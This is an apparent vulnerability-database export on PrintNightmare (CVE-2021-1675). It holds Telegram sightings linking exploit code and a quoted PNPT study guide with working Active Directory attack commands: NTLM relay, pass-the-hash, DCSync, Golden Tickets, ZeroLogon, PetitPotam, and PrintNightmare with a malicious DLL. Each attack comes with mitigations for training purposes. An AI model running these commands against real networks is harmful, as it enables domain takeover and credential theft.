"#exploit\nCVE-2021-35523:\nLPE in Securepoint SSL VPN Client 2.0.3\nhttps://bogner.sh/2021/06/local-privilege-escalation-in-securepoint-ssl-vpn-client-2-0-30\n\nCVE-2021-1675:\n\"PrintNightmare\" - RCE in Windows Spooler 
Service\nhttps://github.com/afwu/PrintNightmare\n]-> Impacket implementation:\nhttps://github.com/cube0x0/CVE-2021-1675", "creation_timestamp": "2024-02-15T13:46:58.000000Z"}, {"uuid": "470e8569-efc4-4026-a24c-deca20b3a8c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4016", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (July 1-31)\nCVE-2021-1675 - Windows Print Spooler EoP\nhttps://t.me/cybersecuritytechnologies/3723\nCVE-2021-34527 - Windows Print Spooler RCE\nhttps://t.me/cybersecuritytechnologies/3750\nCVE-2021-36934 - Windows SeriousSAM EoP\nhttps://t.me/cybersecuritytechnologies/3891\nCVE-2021-33909 - Sequoia - A LPE Vulnerability in Linux\u2019s Filesystem Layer\nhttps://t.me/cybersecuritytechnologies/3884\nCVE-2021-22555 - Heap out-of-bounds write vuln in Linux Netfilter\nhttps://t.me/cybersecuritytechnologies/3841\nCVE-2021-30807 - OOBR in AppleCLCD/IOMobileFrameBuffer\nhttps://t.me/cybersecuritytechnologies/3930\nCVE-2020-27020 - Vulnerability in Kaspersky Password Manager\nhttps://donjon.ledger.com/kaspersky-password-manager\nCVE-2021-35211 - SolarWinds Serv-U Managed File Transfer Vuln\nhttps://t.me/CyberSecurityTechnologies/4714\nCVE-2021-34481 - Windows Print Spooler EoP\nhttps://mobile.twitter.com/gentilkiwi/status/1416429860566847490\nCVE-2021-3438 - Printer\u2019s Drivers Vulnerability\nhttps://t.me/cybersecuritytechnologies/3969", "creation_timestamp": "2024-01-18T03:22:33.000000Z"}, {"uuid": "f9c95687-547e-4223-8d5d-1461d4953b83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4203", "content": "#Analytics\nTop 10 Most Used Vulns of the Month 
(Aug 1-31)\nCVE-2021-1675 - Print Spooler EoP\nhttps://t.me/cybersecuritytechnologies/3723\nCVE-2021-31956 - Win NTFS EoP\nhttps://t.me/cybersecuritytechnologies/4110\nCVE-2021-36958 - Print Spooler RCE\nhttps://mobile.twitter.com/gentilkiwi/status/1416429860566847490?s=20\nCVE-2021-39137 - A consensus-vuln in go-eth\nCVE-2021-22937 - Pulse ConnSecure RCE\nhttps://t.me/cybersecuritytechnologies/4044\nCVE-2021-34473 - Pre-auth Path Confusion\nhttps://www.zerodayinitiative.com/blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell\nCVE-2021-21225 - Vuln in V8's Array.prototype.concat\nhttps://t.me/cybersecuritytechnologies/4090\nCVE-2021-20090 - Path traversal in Buffalo routers\nhttps://t.me/cybersecuritytechnologies/3986\nCVE-2021-26084 - Confluence Server Webwork OGNL Inj\nhttps://t.me/cybersecuritytechnologies/4202\nCVE-2021-3711 - Vulns in OpenSSL\nhttps://nakedsecurity.sophos.com/2021/08/27/big-bad-decryption-bug-in-openssl-but-no-cause-for-alarm", "creation_timestamp": "2021-09-02T11:05:07.000000Z"}, {"uuid": "29459e32-aaa8-45d3-a92b-6452937bc17b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/dc7342/40941", "content": "https://github.com/cube0x0/CVE-2021-1675", "creation_timestamp": "2021-06-30T15:47:13.000000Z"}, {"uuid": "acae1110-2ff3-4429-9d6e-811996aad419", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/LearnExploit/2538", "content": "Discovery of a new and dangerous vulnerability named PrintNightmare that also appears to be in widespread use. 
\n\nSecurity teams have discovered a dangerous vulnerability named PrintNightmare on Windows that lets an attacker take control of the domain remotely. This vulnerability has not yet been patched by Microsoft, but the Chinese security company QiAnXin has published a demo video of an exploit for it, and at the same time reports have been published of hacker groups using this vulnerability. 
\n\nThis vulnerability (CVE-2021-1675) is highly critical and requires immediate action by network admins. Because it relates to the Windows Print Spooler, until Microsoft provides a patch the Spooler service must be stopped and disabled immediately, especially on Domain Controllers. You can carry out the other measures at this link. \n\nThe reputable institute NIST has confirmed this vulnerability with a High rating. 
\nTo check whether your service is vulnerable and has been exploited, you can use this available tool: \n\nGithub \n\nThe source code of this exploit has also been released publicly and is available:\n\nExploit \n\n#PrintNightmare #0day \n\niliyahr\n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2021-07-01T13:32:25.000000Z"}, {"uuid": "1419791f-3f8b-43ee-972a-21fead778ce3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/club31337/484", "content": "https://github.com/cube0x0/CVE-2021-1675", "creation_timestamp": "2024-11-09T01:33:49.000000Z"}, {"uuid": "24090742-4b10-47a5-901c-9472f0ae817d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/club31337/485", "content": "PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service.\n\n#RCE #Windows #CVE #privesc\n\nhttps://github.com/afwu/PrintNightmare", "creation_timestamp": "2024-11-09T01:33:49.000000Z"}, {"uuid": 
"0ddf252c-cc71-4228-baac-05eec5983592", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/bhhub/516", "content": "#BugBountyTips of the Day\nCVE-2021-1675 - PrintNightmare LPE (PowerShell) - Usage: Import-Module .\\cve-2021-1675.ps1 Invoke-Nightmare -DriverName \"HP\" -NewUser \"0day\" -NewPassword \"LulSpool\"  - Repo:  https://t.co/hb8DhzS0jI - Creators: @calebjstewart @_johnhammond  - #CyberSecurity #CTF #bugbountytips  https://t.co/QVfNPMnRmS\n---\n(ReconSpider - Advanced Open Source Intelligence (OSINT) Framework For Scanning IP Addresses, Emails, Websites, Organizations) -  https://t.co/H45Xz60gep #infosec #netsec #pentest #cybersecurity #bugbounty  https://t.co/3fZtbimJjx\n---\n#BugBounty I just earned $3133.70 on @GoogleVRP; bug: P2 internal googlers development dashboard exposed + arbitrary file read as root, the interesting thing about this it's that  it was outside of Google internal network  #infosec  https://t.co/m2fx9ohV8l\n---\nI just published My Methodology In Recon And Find Bugs & My Methodology In Hunting Using Phone  https://t.co/Skzz8BsFBr   special thanks for @XHackerx007 @waseyuddin @Masonhck3571 @aditi_singghh  @snewbill @Bugcrowd @lot of friends here  #BugBounty #bugbountytip #bugbountytips\n---\nHey Hackers, do you know how to exploit ReDoS or RegExDos? It is serious and yet easily exploitable.  Download from here :  https://t.co/kcFSH2jSxp  #infosec #appsec #security #bugbountytips #bugbounty #Hackers #learn365 #zine #webappsec #cybersecurity  https://t.co/d9zwE8bAAI\n---\nYour Full Map To Github Recon And Leaks Exposure  https://t.co/voUww9AwKL  #bugbountytips\n---\nI'm happy to announce that I have passed 10,000 reputations on @Hacker0x01! #BugBounty  https://t.co/oQBDzDqVhH\n---\nExploiting Grafana!  
A mindmap explaining some common bug in grafana and how to exploit it   Repository:  https://t.co/lIj6wucZh0 MindMap:  https://t.co/T2H1cz3bmX  You can use the @pdnuclei tool to check some vulnerabilities in grafana  #bugbountytips #bugbounty #grafana", "creation_timestamp": "2021-08-20T13:37:04.000000Z"}, {"uuid": "0e72704e-a40e-47e3-b43e-2c5cad19a34b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://gist.github.com/sidsecurity/39dfb2f2fbe3bb3a32ae31fdb22febea", "content": "Comprehensive Guide to Active Directory Attacks for PNPT Exam\nThis guide covers all major Active Directory attacks relevant to the Practical Network Penetration Tester (PNPT) certification exam. The PNPT exam assesses your ability to perform external and internal network penetration tests, with heavy emphasis on AD exploitation, lateral movement, and ultimately compromising the Domain Controller.\n\nTable of Contents\nPre-Compromise Enumeration\n\nLLMNR/NBT-NS Poisoning (Responder)\n\nSMB Relay Attacks\n\nKerberoasting\n\nAS-REP Roasting\n\nPassword Spraying\n\nPass-the-Hash (PtH)\n\nDCSync Attack\n\nACL Abuse & BloodHound\n\nUnconstrained Delegation Attacks\n\nADCS Attacks (Certified Pre-Owned)\n\nPetitPotam & NTLM Relay to ADCS\n\nKerberos Golden/Silver Tickets\n\nZeroLogon (CVE-2020-1472)\n\nPrintNightmare (CVE-2021-1675)\n\nnoPac (CVE-2021-42278/CVE-2021-42287)\n\nAttack 1: Pre-Compromise AD Enumeration\nDescription\nBefore executing any attack, you must enumerate the Active Directory environment. 
This includes discovering domain controllers, users, groups, and shares without any credentials (null session) or with low-privileged accounts.\n\nTools Used\nenum4linux-ng\n\nldapsearch\n\nrpcclient\n\nnmap\n\nCrackMapExec (now netexec)\n\nCommands\nSMB Null Session Enumeration:\n\nbash\n# Enumerate via SMB\nrpcclient -U \"\" -N 192.168.1.10\n> srvinfo\n> enumdomusers\n> enumdomgroups\n\n# Using enum4linux-ng\nenum4linux-ng -A 192.168.1.10\n\n# Using CrackMapExec\nnetexec smb 192.168.1.10 -u '' -p '' --shares\nLDAP Anonymous Enumeration:\n\nbash\n# Basic LDAP query\nldapsearch -x -H ldap://192.168.1.10 -b \"DC=corp,DC=local\"\n\n# Dump all users\nldapsearch -x -H ldap://192.168.1.10 -b \"DC=corp,DC=local\" \"(objectClass=user)\" sAMAccountName userPrincipalName\n\n# Dump all computers\nldapsearch -x -H ldap://192.168.1.10 -b \"DC=corp,DC=local\" \"(objectClass=computer)\" dNSHostName\nDNS Enumeration:\n\nbash\n# Query DC via DNS\nnslookup\n> set type=SRV\n> _ldap._tcp.dc._msdcs.corp.local\n\n# Using adidnsdump\nadidnsdump -u corp.local\\\\jsmith -p Password123 --dns-tcp 192.168.1.10\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 1: enum4linux-ng output showing domain users and groups]\n\nCaption: enum4linux-ng successful enumeration of domain users from null session\nMitigation\nDisable anonymous LDAP binds\n\nRestrict null session access via HKLM\\System\\CurrentControlSet\\Control\\LSA\\RestrictAnonymous\n\nEnable SMB signing\n\nAttack 2: LLMNR/NBT-NS Poisoning (Responder)\nDescription\nWhen a host cannot resolve a name via DNS, it falls back to Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS). 
Responder listens for these requests and responds, capturing NTLMv2 hashes from the requesting machine.\n\nTools Used\nResponder (Kali Linux)\n\nInveigh (Windows)\n\nCommands\nStart Responder in Analyze Mode (safe enumeration):\n\nbash\nsudo responder -I eth0 -A\nStart Responder in Poisoning Mode:\n\nbash\nsudo responder -I eth0 -wFvP\nConfigure Responder for SMB Relay (disable SMB/HTTP):\nEdit /usr/share/responder/Responder.conf:\n\nini\n[Responder Core]\n; Servers to start\nSMB = Off\nHTTP = Off\nSQL = On\nFTP = On\nbash\nsudo responder -I eth0 -wFvP\nWindows Alternative (Inveigh):\n\npowershell\n# Load and run Inveigh\nImport-Module .\\Inveigh.ps1\nInvoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 2: Responder capturing NTLMv2 hash from a compromised host]\n\nCaption: Responder captures NTLMv2 hash for user 'jsmith' from host 192.168.1.100\nCracking Captured Hashes\nbash\n# Save hash to file (NTLMv2 format)\nhashcat -m 5600 responder_hash.txt /usr/share/wordlists/rockyou.txt -O\nMitigation\nDisable LLMNR and NBT-NS via Group Policy\n\nEnable Network Access Control\n\nRequire SMB signing\n\nAttack 3: SMB Relay Attack\nDescription\nInstead of cracking captured hashes, you can relay them directly to another machine to authenticate. 
If the target machine has SMB signing disabled, you can execute commands or dump SAM hashes.\n\nPrerequisites\nTarget must have SMB signing disabled\n\nCaptured hash must be from a user with admin privileges on target\n\nCommands\nCheck for SMB Signing Disabled:\n\nbash\nnmap --script=smb2-security-mode.nse -p445 192.168.1.0/24\nStart NTLM Relay (single target):\n\nbash\nntlmrelayx.py -t 192.168.1.20 -smb2support\nRelay to Multiple Targets:\n\nbash\nntlmrelayx.py -tf targets.txt -smb2support\nExecute Command via Relay:\n\nbash\nntlmrelayx.py -t 192.168.1.20 -smb2support -c \"whoami\"\nGenerate Interactive Shell:\n\nbash\n# Start relay with reverse shell\nntlmrelayx.py -t 192.168.1.20 -smb2support -i\n# Then connect to the interactive shell\nnc 127.0.0.1 11000\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 3: ntlmrelayx.py successfully relaying to target and dumping SAM]\n\nCaption: Successful SMB relay attack dumping local SAM hashes from target 192.168.1.20\nMitigation\nEnable SMB signing on all systems\n\nDisable NTLM authentication where possible\n\nImplement SMB over QUIC for modern environments\n\nAttack 4: Kerberoasting\nDescription\nAny authenticated domain user can request a Kerberos Ticket Granting Service (TGS) ticket for any service account with a Service Principal Name (SPN). 
The TGS is encrypted with the service account's NTLM hash, allowing offline cracking.\n\nTools Used\nGetUserSPNs.py (Impacket)\n\nRubeus.exe (Windows)\n\nPowerView\n\nCommands\nLinux - Extract all SPNs:\n\nbash\npython3 GetUserSPNs.py -dc-ip 192.168.1.10 corp.local/jsmith:Password123 -request\nSave Hashes for Cracking:\n\nbash\npython3 GetUserSPNs.py -dc-ip 192.168.1.10 corp.local/jsmith:Password123 -request -outputfile kerberoast_hashes.txt\nCrack with Hashcat:\n\nbash\n# Mode 13100 = Kerberos 5 TGS-REP (etype 23)\nhashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -O\nWindows - Using Rubeus:\n\npowershell\n# Request all SPNs\nRubeus.exe kerberoast /outfile:hashes.txt\n\n# Request specific SPN\nRubeus.exe kerberoast /spn:\"MSSQLSvc/sql.corp.local\" /nowrap\nUsing PowerView:\n\npowershell\n# Find all SPNs\nGet-DomainUser -SPN | Select-Object samAccountName, ServicePrincipalName\n\n# Request TGS\nGet-DomainUser -SPN | Request-SPNTicket\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 4: GetUserSPNs.py output with hash for svc_sql account]\n\nCaption: Kerberoasting attack successfully extracts TGS ticket for svc_sql account\nMitigation\nUse long, complex passwords (25+ characters) for service accounts\n\nUse Group Managed Service Accounts (gMSA)\n\nMonitor Event ID 4769 for unusual TGS requests\n\nAttack 5: AS-REP Roasting\nDescription\nAccounts with \"Do not require Kerberos preauthentication\" enabled will respond to authentication requests with an AS-REP message encrypted with the user's password hash. 
This attack requires NO valid credentials.\n\nCommands\nFind and Roast All Vulnerable Users:\n\nbash\npython3 GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt\nTarget a Specific User:\n\nbash\npython3 GetNPUsers.py corp.local/jsmith -request -format hashcat\nCrack AS-REP Hashes:\n\nbash\n# Mode 18200 = Kerberos 5 AS-REP (etype 23)\nhashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt -O\nWindows - Using Rubeus:\n\npowershell\n# Find users with preauth disabled\nRubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 5: GetNPUsers.py successfully retrieving AS-REP hash for user 'svc_backup']\n\nCaption: AS-REP Roasting attack retrieves crackable hash without any authentication\nMitigation\nAudit accounts with preauthentication disabled\n\npowershell\nGet-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth\nEnable preauthentication on all accounts\n\nMonitor Event ID 4768 with error code 0x0\n\nAttack 6: Password Spraying\nDescription\nInstead of brute-forcing one account, password spraying attempts one common password against many accounts. This stays under the lockout threshold.\n\nCommands\nUsing CrackMapExec:\n\nbash\nnetexec smb 192.168.1.10 -u users.txt -p 'Winter2025!' 
--continue-on-success\nUsing DomainPasswordSpray.ps1:\n\npowershell\nImport-Module .\\DomainPasswordSpray.ps1\nInvoke-DomainPasswordSpray -Password Winter2025!\nUsing Kerbrute:\n\nbash\n# Password spray using Kerberos\nkerbrute passwordspray -d corp.local --dc 192.168.1.10 users.txt \"Winter2025!\"\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 6: CrackMapExec successful password spray finding valid credentials]\n\nCaption: Password spray discovers valid credentials for multiple users\nMitigation\nImplement Azure AD Password Protection\n\nUse Fine-Grained Password Policies for privileged accounts\n\nEnable SIEM alerting for distributed failed authentication\n\nAttack 7: Pass-the-Hash (PtH)\nDescription\nWindows NTLM authentication allows authentication using only the hash of a password. Once an NTLM hash is obtained, an attacker can authenticate without ever knowing the plaintext password.\n\nCommands\nUsing CrackMapExec:\n\nbash\nnetexec smb 192.168.1.20 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c\nUsing Impacket:\n\nbash\n# Using psexec\npython3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.20\n\n# Using wmiexec\npython3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.20\n\n# Using smbexec\npython3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.20\nWindows - Using Mimikatz:\n\npowershell\n# Pass the hash\nsekurlsa::pth /user:Administrator /domain:corp.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 7: psexec.py successful pass-the-hash attack gaining shell]\n\nCaption: Pass-the-Hash attack successfully creates remote shell using only NTLM hash\nMitigation\nEnable Protected Users group for privileged accounts\n\nImplement Credential Guard (VBS)\n\nEnforce tiered administration 
models\n\nDisable NTLM where possible\n\nAttack 8: DCSync Attack\nDescription\nIf an account has \"Replicating Directory Changes\" permissions, it can impersonate a Domain Controller and request replication of AD data, including password hashes for ANY account, including krbtgt and Domain Admins.\n\nCommands\nDump Specific User Hash:\n\nbash\npython3 secretsdump.py corp.local/domainadmin:Password123@192.168.1.10 -just-dc-user krbtgt\nDump All NTLM Hashes:\n\nbash\npython3 secretsdump.py corp.local/domainadmin:Password123@192.168.1.10 -just-dc-ntlm\nDump Entire NTDS.dit:\n\nbash\npython3 secretsdump.py corp.local/domainadmin:Password123@192.168.1.10 -just-dc\nUsing Mimikatz (if on DC or with appropriate rights):\n\npowershell\nlsadump::dcsync /user:krbtgt\nlsadump::dcsync /domain:corp.local /user:administrator\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 8: secretsdump.py successful DCSync extracting krbtgt hash]\n\nCaption: DCSync attack extracts krbtgt hash, enabling Golden Ticket creation\nMitigation\nRestrict replication rights to only Domain Controllers\n\nAudit DCSync rights using BloodHound\n\npowershell\n(Get-Acl \"AD:\\DC=corp,DC=local\").Access | Where-Object { $_.ActiveDirectoryRights -match \"DS-Replication\" }\nMonitor Event ID 4662 for replication access\n\nAttack 9: ACL Abuse & BloodHound\nDescription\nActive Directory objects have Access Control Lists that can be misconfigured. 
A helpdesk account might have GenericAll on a Domain Admin account, or WriteDACL allowing modification of permissions.\n\nCommands\nCollect Data with BloodHound.py:\n\nbash\nbloodhound-python -u jsmith -p Password123 -d corp.local -dc 192.168.1.10 -c All --zip\nCollect Using SharpHound (Windows):\n\npowershell\n# Ingest all data\nSharpHound.exe -c All\n\n# With specific domain controller\nSharpHound.exe -c All -d corp.local -dc dc.corp.local\nAbuse GenericWrite to Add to Group:\n\npowershell\nAdd-DomainGroupMember -Identity \"Domain Admins\" -Members \"jsmith\"\nAbuse WriteDACL to Grant DCSync Rights:\n\npowershell\nAdd-DomainObjectAcl -TargetIdentity \"DC=corp,DC=local\" -PrincipalIdentity jsmith -Rights DCSync\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 9: BloodHound GUI displaying attack path from user to Domain Admin]\n\nCaption: BloodHound visualization shows shortest path to Domain Admin via ACL misconfigurations\nMitigation\nRun BloodHound defensively on a schedule\n\nAudit all non-default ACL entries\n\nImplement tiered administration\n\nUse tools like ADACLScanner for bulk reporting\n\nAttack 10: Unconstrained Delegation Attacks\nDescription\nWhen a computer has unconstrained delegation enabled, it stores TGTs of any user that authenticates to it. 
By coercing a Domain Controller to authenticate (via PrinterBug or PetitPotam), the attacker can capture a Domain Admin TGT.\n\nCommands\nFind Systems with Unconstrained Delegation:\n\npowershell\n# Using PowerView\nGet-DomainComputer -Unconstrained | Select-Object samAccountName, dnshostname\n\n# Using AD PowerShell\nGet-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation, ServicePrincipalName\nMonitor for TGTs with Rubeus:\n\npowershell\nRubeus.exe monitor /interval:5 /nowrap\nCoerce Authentication with PrinterBug:\n\nbash\npython3 printerbug.py corp.local/username:password@TARGET_DC_IP VICTIM_IP\nExtract TGT and Pass-the-Ticket:\n\npowershell\nRubeus.exe ptt /ticket:\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 10: Rubeus monitoring captures Domain Admin TGT after coercion]\n\nCaption: Unconstrained delegation attack captures DC TGT, granting Domain Admin access\nMitigation\nAvoid unconstrained delegation entirely\n\nUse constrained delegation or RBCD with explicit restrictions\n\nAudit for TrustedForDelegation accounts\n\nAttack 11: ADCS Attacks (Certified Pre-Owned)\nDescription\nActive Directory Certificate Services (AD CS) misconfigurations allow attackers to request certificates for arbitrary users, including Domain Admins, leading to complete domain compromise.\n\nCommands\nEnumerate AD CS with Certipy:\n\nbash\n# Find vulnerable templates\ncertipy-ad find -u jsmith@corp.local -p Password123 -dc-ip 192.168.1.10\n\n# Save output\ncertipy-ad find -u jsmith@corp.local -p Password123 -vulnerable -output adcs_enum\nRequest Certificate via Vulnerable Template:\n\nbash\ncertipy-ad req -u jsmith@corp.local -p Password123 -ca CORP-DC-CA -template User -dc-ip 192.168.1.10\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 11: Certipy find output showing vulnerable certificate templates]\n\nCaption: Certipy enumerates AD CS and identifies ESC1 vulnerability (Client Authentication template)\nMitigation\nDisable vulnerable 
certificate templates\n\nEnforce manager approval for sensitive templates\n\nImplement certificate auditing\n\nAttack 12: PetitPotam & NTLM Relay to ADCS\nDescription\nPetitPotam coerces a Domain Controller to authenticate to an attacker-controlled server. Combined with NTLM relay to ADCS HTTP endpoints, this yields a certificate for the DC, allowing DCSync and full domain compromise.\n\nPrerequisites\nAD CS server with Web Enrollment enabled\n\nDomain Controller unpatched for CVE-2021-36942\n\nCommands\nSetup NTLM Relay to ADCS:\n\nbash\npython3 ntlmrelayx.py -debug -smb2support --target http://adcs.corp.local/certsrv/certfnsh.asp --adcs --template DomainController\nRun PetitPotam to Coerce DC:\n\nbash\npython3 PetitPotam.py ATTACKER_IP DC_IP\nExtract Certificate (Linux):\n\nbash\n# Save base64 certificate\ncat base64 | base64 -d > certificate.pfx\n\n# Request TGT with PKINIT\npython3 gettgtpkinit.py corp.local/DC01$ -cert-pfx certificate.pfx out.ccache\n\n# Set cache\nexport KRB5CCNAME=out.ccache\n\n# DCSync using TGT\npython3 secretsdump.py -k -no-pass corp.local/DC01\\$@DC01.corp.local\nWindows Alternative using Rubeus:\n\npowershell\n# Request TGT from certificate\nRubeus.exe asktgt /user:DC01$ /certificate: /ptt\n\n# DCSync\nmimikatz \"lsadump::dcsync /user:krbtgt\"\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 12: PetitPotam coercing DC to authenticate to ntlmrelayx]\n\nCaption: PetitPotam forces Domain Controller authentication, captured by ntlmrelayx\nMitigation\nApply Microsoft patch KB5005413\n\nDisable NTLM on AD CS servers\n\nEnable EPA (Extended Protection for Authentication)\n\nAttack 13: Kerberos Golden/Silver Tickets\nDescription\nWith the krbtgt hash, attackers create Golden Tickets - valid TGTs for ANY user (including non-existent ones). 
Silver Tickets target specific services using service account hashes.\n\nGolden Ticket Commands\nUsing Mimikatz:\n\npowershell\n# Create Golden Ticket for Domain Admin\nkerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:HASH /id:500 /ptt\n\n# Create Golden Ticket with custom expiry\nkerberos::golden /user:EvilAdmin /domain:corp.local /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:HASH /startoffset:0 /endin:600 /renewmax:10080 /ptt\nUsing Impacket (Linux):\n\nbash\npython3 ticketer.py -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nSilver Ticket Commands\nCreate Silver Ticket for CIFS Service:\n\npowershell\nkerberos::golden /user:EvilUser /domain:corp.local /sid:S-1-5-21-123456789-123456789-123456789 /target:DC01.corp.local /service:cifs /rc4:MACHINE_ACCOUNT_HASH /ptt\nAccess DC with Silver Ticket:\n\nbash\n# Using the ticket to access CIFS\npython3 psexec.py -k corp.local/EvilUser@DC01.corp.local\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 13: Mimikatz Golden Ticket creation and successful psexec to DC]\n\nCaption: Golden Ticket allows complete Domain Controller access without valid credentials\nMitigation\nRotate krbtgt password twice (after DC compromise)\n\nEnable KRBTGT password rotation automation\n\nMonitor for anomalous TGT requests (Event ID 4768)\n\nLimit lifetime of Kerberos tickets\n\nAttack 14: ZeroLogon (CVE-2020-1472)\nDescription\nA critical vulnerability in Netlogon protocol (MS-NRPC) allows attackers to set the machine account password of a Domain Controller to an empty string, then DCSync as that DC.\n\nCommands\nCheck if Vulnerable:\n\nbash\npython3 zerologon_tester.py DC01 192.168.1.10\nExploit to Change DC Password:\n\nbash\npython3 cve-2020-1472-exploit.py DC01 192.168.1.10\nAfter Exploit - DCSync:\n\nbash\npython3 secretsdump.py corp.local/DC01\\$@192.168.1.10 -no-pass\nRestore Original Password 
(Critical!):\n\nbash\n# Extract original password hash from DCSync results\npython3 restorepassword.py DC01@DC01.corp.local -target-ip 192.168.1.10 -hexpass ORIGINAL_HASH\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 14: ZeroLogon exploit successfully changing DC machine account password]\n\nCaption: ZeroLogon vulnerability exploited, enabling DCSync with empty password\nMitigation\nApply Windows updates from August 2020\n\nEnable enforced Netlogon signing\n\nMonitor for Event ID 5829, 5830, 5831\n\nAttack 15: PrintNightmare (CVE-2021-1675)\nDescription\nThe Print Spooler service on Windows allows remote attackers to execute arbitrary code with SYSTEM privileges. This affects Domain Controllers and member servers.\n\nCommands\nRemote DLL Injection Exploit:\n\nbash\n# Using CVE-2021-1675.py\npython3 CVE-2021-1675.py corp.local/username:password@TARGET_IP /path/to/malicious.dll\nUsing Impacket Version:\n\nbash\npython3 printerbug.py -dll /path/to/malicious.dll corp.local/username:password@TARGET_IP\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 15: PrintNightmare exploitation yielding SYSTEM shell on DC]\n\nCaption: PrintNightmare vulnerability exploited to gain SYSTEM privileges on Domain Controller\nMitigation\nDisable Print Spooler service on Domain Controllers\n\nApply Microsoft security patches\n\nImplement print service hardening\n\nAttack 16: noPac (CVE-2021-42278/CVE-2021-42287)\nDescription\nA chain of two vulnerabilities affecting all Windows Domain Controllers. 
It allows a standard domain user to impersonate a Domain Controller and request a TGT for Domain Admin.\n\nCommands\nUsing noPac.py:\n\nbash\n# Request Service Ticket to domain controller\npython3 noPac.py corp.local/jsmith:Password123 -dc-ip 192.168.1.10 -dc-host DC01.corp.local -shell --impersonate Administrator\n\n# Or with hash\npython3 noPac.py corp.local/jsmith -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -dc-ip 192.168.1.10\nManual Exploitation with Rubeus:\n\npowershell\n# Add machine account\nAdd-MachineAccount -MachineAccount EvilPC -Password Password123\n\n# Clear SPNs\nSet-ADComputer EvilPC -ServicePrincipalNames @{}\n\n# Change hostname to DC\nSet-ADComputer EvilPC -DnsHostname DC01.corp.local\n\n# Request TGT\nRubeus.exe asktgt /user:EvilPC$ /password:Password123 /domain:corp.local /dc:DC01.corp.local /nowrap\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 16: noPac.py successfully obtaining DA shell from standard user]\n\nCaption: noPac attack chain escalates from low-privilege user to Domain Admin shell\nMitigation\nApply Microsoft patches (October 2021 and later)\n\nMonitor for computer account name changes (Event ID 4742)\n\nImplement PAC validation\n\nTools Reference Summary\nTool\tPurpose\tSource\nResponder\tLLMNR/NBT-NS poisoning\tKali default\nImpacket Suite\tVarious AD attacks\tpipx install impacket\nBloodHound\tAttack path mapping\tKali default\nRubeus\tKerberos abuse\tGitHub\nMimikatz\tCredential 